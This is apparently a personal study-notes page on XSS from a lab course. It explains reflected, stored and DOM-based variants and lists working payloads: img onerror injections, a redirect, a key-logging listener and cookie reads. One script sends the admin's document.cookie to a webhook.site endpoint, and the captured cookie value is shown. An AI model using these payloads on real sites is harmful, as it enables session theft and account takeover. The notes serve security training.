🏠 Home BlogGitHub📚 Buy Me a Book

Web App - XSS

➡️ Cross-site scripting (XSS) allows an attacker to compromise the interactions of the users with a vulnerable application. It lets the attacker execute (malicious) JavaScript in a victim's browser, compromising the user's interaction with the application.

  • Reflected XSS

    • when an application unsafely includes user-supplied data (injected script) from an HTTP request in its immediate response

    • payload (malicious script) come from the current HTTP request

  • Stored XSS

    • when an application receives and stores data from an untrusted source and unsafely includes it within its later HTTP responses

    • payload (malicious script) come from the application's database

  • DOM-based XSS

    • when client-side Javascript (code) unsafely processes data from an untrusted source and writes it back to the DOM

    • everything happens locally in the browser

alert(1)
print()
prompt("Hello")

# log pressed key
function logKey(event){console.log(event.key)}
document.addEventListener('keydown', logKey)

XSS - DOM

  • The request happens entirelly locally

    • no request seen in the browser Dev Tools / Network tab

  • Try some basic payloads

<script>prompt(1)</script>
# did not work, it is not called/triggered

<img src=x onerror ="prompt(1)">
# works - injects an event-driven JavaScript payload that executes prompt(1) when the image fails to load due to an invalid source

<img src=x onerror ="window.location.href='https://tcm-sec.com'">
# redirect the user to another webpage

  • The lab can be used for testing other payloads

Stored XSS

  • To check if XSS is stored for more users, use

    • incognito sessions

    • or Firefox Containers

    • to create 2 different environments with separate/difference accounts

  • First try some HTML injection, once found out if it works, XSS follows

    • every user that visits the page is impacted by the stored XSS payload

<h1>Test</h1>
# works - check on the second environment the Stored XSS

<script>prompt(1)</script>
# works - refresh second environment and you'll see the prompt

<script>alert(document.cookie)</script>
# Cookie can be stolen

XSS - Challenge

  • Open http://localhost/labs/x0x03.php first Firefox container

  • Open http://localhost/labs/x0x03_admin.php in the second container

  • Goal - exfiltrate the admin cookie

  • Use netcat or https://webhook.site (not for private traffic)

    • use Collaborator (with BurpSuite Pro)

<script>var i = new Image; i.src="https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76/?"+document.cookie</script>
admin_cookie
5ac5355b84894ede056ab81b324c4675
PreviousWeb App - SQL InjectionNextWeb App - Command Injection

Last updated

Was this helpful?